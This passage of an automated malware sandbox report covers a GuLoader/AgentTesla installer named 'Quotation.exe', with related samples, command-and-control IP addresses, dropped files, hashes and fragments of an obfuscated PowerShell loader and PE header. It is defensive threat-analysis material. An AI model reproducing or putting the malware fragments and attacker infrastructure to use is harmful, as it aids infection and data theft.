                                            PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            HOSTUS-GLOBAL-ASHostUSHKDHL_DOCUMENT_73838374673_6647383743_PDF.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 185.185.40.11
                                            DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            JOU24013126.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.128.228.214
                                            Unpaid INV02.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            New_order_requirments_7383882736_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 185.185.40.11
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214
                                            DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 104.128.228.214

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.7946103555693362
                                            Encrypted:false
                                            SSDEEP:3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWz:QAgN8nj/ka4
                                            MD5:6CCE8320B4264B1DF8F753016B70F56B
                                            SHA1:5A0F55907D5BDDE28F3E99A2730CA9529FCFE06D
                                            SHA-256:CAEDA415B301FD75CADF8B2FFC850333C700D330493EFD2AD7E49D9A719D0540
                                            SHA-512:C94F559353E64BB3A91D290E2026A55A4DF09AC8514D1BA6809F6F0A4DDD3F94F82650C418E3CC1D48ADEBB336511E7C48B0749DC0660EE698F286B5F3D18F45
                                            Malicious:false
                                            Reputation:low
                                            Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8bbcd9d1, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.7864766502936879
                                            Encrypted:false
                                            SSDEEP:1536:7SB2ESB2SSjlK/6vDfi5Wy10MctJ+t9ka4XQ0/Ykr3g16L2UPkLk+kyt4eCu3uZB:7azaovh7uka4Es2U1RFNp3pvHzrHBHz
                                            MD5:20E01625EAF307840CC892FA1CCC627F
                                            SHA1:FF69B42063FFC3CB012703DFE730F34CDE87188D
                                            SHA-256:290925E36E3ECE79CFE3F054AB8082EEE75BDA40FB0B932AE0B01B216D9B1624
                                            SHA-512:E31F91B0817E769DF6EB72DCF519998B42B28F9C04E6293A45452DCE7405D8A384142CED48E80DF84D111B724F91E603118D95A4D3DD1B543A3686CF3D993692
                                            Malicious:false
                                            Reputation:low
                                            Preview:....... ...............X\...;...{......................0.z...... ...{.......|5.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................F........|5?................T..8.....|5..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.08174181027402991
                                            Encrypted:false
                                            SSDEEP:3:sdDS/llKYeCcZW/Msjv/Ss/IGYZX/WY1mElillSdLvl+/rS56/:sBi/KztZXsYenpQN0e
                                            MD5:1C7F9927E051D4D9CC14F2275A9F1DB7
                                            SHA1:D6C86511B1BE860235AEBB821F7612C6E5A00144
                                            SHA-256:56FADA178E8E5C7DF49CE35AF4864AF6AE3DF060A554807241BA17400840C4F9
                                            SHA-512:2AAB77AD5A8CAF4115ED9A1A39C09D735DAF3C3491261C58B3FE9E323713F6F319E313E6E30E7232F500CA0BA4F32D24E7BEBBF214AE4D48DE78F268B8E0980B
                                            Malicious:false
                                            Reputation:low
                                            Preview:...f.....................................;...{.......|5.. ...{........... ...{... ...{..#.#.. ...{.|................T..8.....|5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):8003
                                            Entropy (8bit):4.838950934453595
                                            Encrypted:false
                                            SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                            MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                            SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                            SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                            SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub1lwqn2.g0l.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuvmtcd4.uji.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Dodecyl222.Lys

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):310341
                                            Entropy (8bit):7.70409389821086
                                            Encrypted:false
                                            SSDEEP:6144:idBXMazGv40rZ1ZxKoIi40BDATbdSg9KY4nuqokAy+648IEUF1/O:icaP0rZGz0B8TB8Zu8f9UfO
                                            MD5:FE4EBE69BAD1C16FA19972B1E96D92C1
                                            SHA1:4923C0A9C1F6834FD58BE6076C590F627E0B6B38
                                            SHA-256:B71F58D241958F81AFDBF9AF0DC43C8DDD3FB6A60412A55FD13EA2FF4A2EA92E
                                            SHA-512:1552544FFBB4BF46C1D101271A526053EC77C13C8C1B53BAC5AECC12E86314EEB2A25C4810683013701CFCD18564CFE6D21E9743378AFB8C1194497A6D631573
                                            Malicious:false
                                            Preview:...............dd......R......S.........B..D.K.................22..f.....AAAA...........a.......................V.....6...................ttt.......DDDD.r....++++.........................v.g.......O..^...............@.....X............I.......999...........................................a...........[.......F.d..yy....................22..0......;................................7......._...WW...........U.._.......99..???...v......NNNN................|||........(..X........................;;;;;;.vv.........|...\\\..................QQQ...NNN.......}.o.........................0.........ZZ....Z.&&....@..*...................555.,,....___.uuuu.........C....E.V....CC.....p...........OO......LL..q.....i.pp.........-.c.$...Y..............Z...-...........!!!!....:::.........k.|.kk......".Z...0.)........k............_........J.......Z./...-......*..........<<<<<........G..)..BBBB...I......~..&&&&.....1...||.j.........................}......[...=......p..BB....cc..L.....DDD......`...............p..

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:ASCII text, with very long lines (58742), with no line terminators
                                            Category:dropped
                                            Size (bytes):58742
                                            Entropy (8bit):5.335849651135647
                                            Encrypted:false
                                            SSDEEP:1536:CdJDUEXzADTjS74atE7VtzDQeJQ3XAGPc2FD1lnWUaZDr+Be6SnQ:WJDUEXzITjDhNpCRPcoBlJIf+QnnQ
                                            MD5:B36B0DD89B921F0AB2479E4152D2BAFA
                                            SHA1:7FC2C95C52394D17A0E045DD264E05C3F0230FE0
                                            SHA-256:E645830CBAE91437C7DEDA618926095D71A44662BB797B1196A9B9FCF3E8E58F
                                            SHA-512:433D5D10478C7198CC772264683B3340C9474A2B01306DC6D247DD7369796E32D31AE0B27157B4FBF65ED077AB13FDF6305B8F6A16EC2DE02019EE89977D5C1B
                                            Malicious:true
                                            Preview:$Thomisme=$cassava;<#Thailnderes Enforcive Strbsommes Ivrkstterne Youngish #><#Lonesomes posthusets Mundingen Capturable Greffier Tuppences Servicernes #><#Egenkapitaler Cypriotiske godkendelsesansgninger Dumpeprocenters Dialektforskningens Emballage Sorrance #><#Nonmutably Elektrokardiogrammer Churchmanship Skinball Satiriseringerne Brasekartoflen Konomibegrebet #><#pengelnsudviklings Socialiseringslovs Sygesikring #><#Hegemoniets Abrase Klaptorsken Rensningsprocessernes #><#Businesses Seborrhoea Skjoldbruskens #><#mikael alarmist Witness #><#Hyperlipemia Frygteligste Mercerisering #><#Datauheldenes kosakkernes Milieuforstyrrelser Intensitometer Cigarmagernes Soldanrie Radiser #><#dissolutionist Hopon Wreathing #><#Taprest Bilfragter Universityship #><#Alfons Ravnekrogsmentalitetens Skrivestillingen Tiljublingen #><#Briner Omasa Vittigt #><#Spytstenenes Declined Forretningsforbindelse Kurvblomstfamilie Bevaringsvrdigst #><#Kontroltasterne Acraldehyde unmelodic Sporvognsbilletternes Ma

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Unenslave223.ges

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):261968
                                            Entropy (8bit):0.4330674979527136
                                            Encrypted:false
                                            SSDEEP:384:rtdlg6RUtYhD99da2eRBbphP7fe/3EtUbVgZTGaLB6wFFoYGogiGJF210bIdX0aB:JkM4ZlhPqyZTGHsdEDRbd698
                                            MD5:B2D7923E813E6441881FA0CA3EFF4CF2
                                            SHA1:F5DFC97492BF74D6392F974324A3C19B10130424
                                            SHA-256:AFF21818C78204023BD1DBD1A9D284FBC820B76C3971018BCA5744EE9EBCEE73
                                            SHA-512:4C4A72F5F6E10BCF37787003A761033B3DE075CF444D4DD2248AB942E588E1A18F214EAE3E0EE76CA3151B704704460EF936DDB029EB6496DF5AB34F3AE7CB5A
                                            Malicious:false
                                            Preview:.........................................................................................................................................=.P........................................................................................................................................................................................................................................................@............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......................................................

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:dropped
                                            Size (bytes):806728
                                            Entropy (8bit):7.047498444456538
                                            Encrypted:false
                                            SSDEEP:12288:shUQmD3ceDqZWN1gJX58mnigb+Wj1pDpj1m2I4eoGoOI:shUD3cZWbSX584fzDpj1mMkoV
                                            MD5:833003BDB504BA4D779A2AFF899859E0
                                            SHA1:8ACB52C29E7EDC16E99A1DCF96F2A9ABC6045771
                                            SHA-256:076191D0AD7379E339A2824BB74C2C1906477A32BE3F92318C436500CDCF0AF9
                                            SHA-512:D0E8EB7838074BB64D389439CB5E0DB0B238DFE4E68089828DE63D675815B95A0606613D18DFA8DC0ECF35C62128808488ACDFCBB06BBB3C0BC81065DC3AD462
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 58%
                                            • Antivirus: Virustotal, Detection: 15%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..............................................y..........x6...............................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc....y.......z..................@..@................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\familieplejer.nar

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):793014
                                            Entropy (8bit):0.4265128622330899
                                            Encrypted:false
                                            SSDEEP:768:8sUDJYwTA2VcXemhzPw4bs939gcZ5EROwm6hvObs7GER6pgudNmgb3bDFS7BWGpc:nlvci
                                            MD5:EBFE35622A723856BAFC58B337B6B544
                                            SHA1:70ED02B5753E7BA5CA5B27974324EABFB0E7E283
                                            SHA-256:BF275129317E5F505CA60F20E28A899C01DEA34157597F8152FF7EAE2F7CD474
                                            SHA-512:F09155DA5B96B9C4AF1584B55DD993BE1A76836D941DB040393AE4641CE6BF33FBCBEBA985B0A8155682729CE2074E79670348FBDC370EDC3C5EECC8DA42B106
                                            Malicious:false
                                            Preview:..............................................................................................................................B......................................................................................................................................................................................................................................................................................................................................................................<...................]............................................................K..................................H...................................................................................................................................................................................t...............................................................................................................B...........?.............................................................................................

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\medtog.txt

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:ASCII text, with very long lines (376), with no line terminators
                                            Category:dropped
                                            Size (bytes):376
                                            Entropy (8bit):4.199662364231632
                                            Encrypted:false
                                            SSDEEP:6:QZXWIGXJ+5D6K7Q+rZqIv+uA3yyrEBjVgqB7TyzDNOEj4PGFbK0IUGucPpPuSqdP:u30J24iHA3IvBfKDhj+LduLdAAu6
                                            MD5:1D4D497D8A357DFDFEFF3F674A1EB0ED
                                            SHA1:3631BE0426E1C85F24D997CFCD7CE73CC73939C0
                                            SHA-256:7F5F923C94916C0194875A56B804D5DC852F5A8941E6CB79998D95CE28D07DF1
                                            SHA-512:5A626CC44A88EFD9EB3CC3AFFB33989892C53DCC59700EE202D8E414C64D734A0A1088B0E5ED26AD972ABC01C1C23AE243559FF64A6BA234BA8047F841FFF0D2
                                            Malicious:false
                                            Preview:landsdele terminalinterface geologers materialeforvaltere blitzpre telephoning.lasten tranquiliser procavia,frontbetjent omskiftet sordidness voussoirs tinnet underguard est.taanserne apesthetize udfrielsernes uncalorific footballs,humanitaer cigartnders liveners staboy faldstammes fastholdelses,stentjskrukkes operably pantdress sinteren seventeenthly undflyedes ryddeliges.

                                            C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\wastemen.gra

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):514030
                                            Entropy (8bit):0.4310374641562281
                                            Encrypted:false
                                            SSDEEP:768:EB1lZMTMvinTtFpxsLqLDGFq5yEFCbvLPDtmBotJQQMWYTzQVgacIQa94Q/4W:ow6
                                            MD5:0F954B1780BA88D2877109C1442BB87C
                                            SHA1:39DC22B8FFCC0BEE4D4D553829AF86BB4D1CB01D
                                            SHA-256:09AE598D60F6A379CFCA3D07FE1AC946B2CB65136BE23BE607C53BAFDF516C3D
                                            SHA-512:AED80331811301C7806F5B1DE8675F1BA4F2252769C038A491F1984FF6289C1AEABAA0741223442A6B397CF29F91E6640D8CDFE28D073C0A7626FAA2A02129FA
                                            Malicious:false
                                            Preview:...........................................................................................................................E...................................F...........................................................................................................................................Q...............x..................................................................................................B.....................N..................................................................................................................................................................................................Y................................................................................................................................................................Y...............E.........................................................................................<.....................................................................................................

                                            C:\Users\user\dok.lnk

                                            Download File
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):1592
                                            Entropy (8bit):3.1966983518434473
                                            Encrypted:false
                                            SSDEEP:24:8AyKRWLgD4/BV02DeOiWvv+y+pWlqvtoLtifOJpqy:8ZgDszheOiWvvqpqqvt+tiffy
                                            MD5:99D5FFF461672C608E9DFF05E761D556
                                            SHA1:D68C30921D6D38657A6047A4974273C17E9A9976
                                            SHA-256:CB6A6A22A652339AB561FFB982BC3BA70AF9901FB79C730715B8358B72FFDD0B
                                            SHA-512:8E65EB492FA6C05D9AED378DD0E0C95C12A8B2FF1AF940BCEA5B61D5461C709DDDF066F59ADD6B0C74E3D6F763F54DD95A39F5C1999F78E591187FE80C483392
                                            Malicious:false
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................c.a.l.i.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .t.1...........selvretfrdigheden.T............................................s.e.l.v.r.e.t.f.r.d.i.g.h.e.d.e.n... ...2...........familieforsrgeren.ska.\............................................f.a.m.i.l.i.e.f.o.r.s.r.g.e.r.e.n...s.k.a...$...]...\.A

                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):55
                                            Entropy (8bit):4.306461250274409
                                            Encrypted:false
                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                            Malicious:false
                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.047498444456538
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Quotation.exe
                                            File size:806'728 bytes
                                            MD5:833003bdb504ba4d779a2aff899859e0
                                            SHA1:8acb52c29e7edc16e99a1dcf96f2a9abc6045771
                                            SHA256:076191d0ad7379e339a2824bb74c2c1906477a32be3f92318c436500cdcf0af9
                                            SHA512:d0e8eb7838074bb64d389439cb5e0db0b238dfe4e68089828de63d675815b95a0606613d18dfa8dc0ecf35c62128808488acdfcbb06bbb3c0bc81065dc3ad462
                                            SSDEEP:12288:shUQmD3ceDqZWN1gJX58mnigb+Wj1pDpj1m2I4eoGoOI:shUD3cZWbSX584fzDpj1mMkoV
                                            TLSH:05058C13B9D82414FC2CA33E546B8E7A42777F7289BA502F75A8742345F37427A6312E
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....

                                            File Icon

                                            Icon Hash:454d6950f2829659

                                            Static PE Info

                                            General

                                            Entrypoint:0x403359
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b34f154ec913d2d2c435cbd644e91687

                                            Authenticode Signature

                                            Signature Valid:false
                                            Signature Issuer:E=Slimier@Geminous.Acc, O=unsympathisingly, OU="stormflodssikringen Kuplernes Stephen ", CN=unsympathisingly, L=Washington, S=District of Columbia, C=US
                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                            Error Number:-2146762487
                                            Not Before, Not After
                                            • 09/11/2023 10:55:56 08/11/2026 10:55:56
                                            Subject Chain
                                            • E=Slimier@Geminous.Acc, O=unsympathisingly, OU="stormflodssikringen Kuplernes Stephen ", CN=unsympathisingly, L=Washington, S=District of Columbia, C=US
                                            Version:3
                                            Thumbprint MD5:AB1C2A35379CD27DDD8300399BAA1FF0
                                            Thumbprint SHA-1:C05EFE580ED696F49B7A2B472783B16542FBD19E
                                            Thumbprint SHA-256:2F2BC1DCF6773F9465741B14FEB9C39628A0DB88490B0EBE3FA38A9C10E43BF1
                                            Serial:15D49F29425D75862DA241C5BD47677940A9E01D

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080A8h]
                                            call dword ptr [004080A4h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [0042A20Ch], eax
                                            je 00007FD2E931E403h
                                            push ebx
                                            call 00007FD2E93216B5h
                                            cmp eax, ebx
                                            je 00007FD2E931E3F9h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007FD2E932162Fh
                                            push esi
                                            call dword ptr [00408150h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007FD2E931E3DCh
                                            push 0000000Ah
                                            call 00007FD2E9321688h
                                            push 00000008h
                                            call 00007FD2E9321681h
                                            push 00000006h
                                            mov dword ptr [0042A204h], eax
                                            call 00007FD2E9321675h
                                            cmp eax, ebx
                                            je 00007FD2E931E401h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007FD2E931E3F9h
                                            or byte ptr [0042A20Fh], 00000040h
                                            push ebp
                                            call dword ptr [00408044h]
                                            push ebx
                                            call dword ptr [004082A0h]
                                            mov dword ptr [0042A2D8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 004216A8h
                                            call dword ptr [00408188h]
                                            push 0040A2C8h

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x579b0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xc36780x18d0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x62a50x64005814efda24a547f46f687d77de540309False0.6590234375data6.431421556070023IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x13960x1400ef1be07ca8b096915258569fb3718a3cFalse0.453125data5.159710562612049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
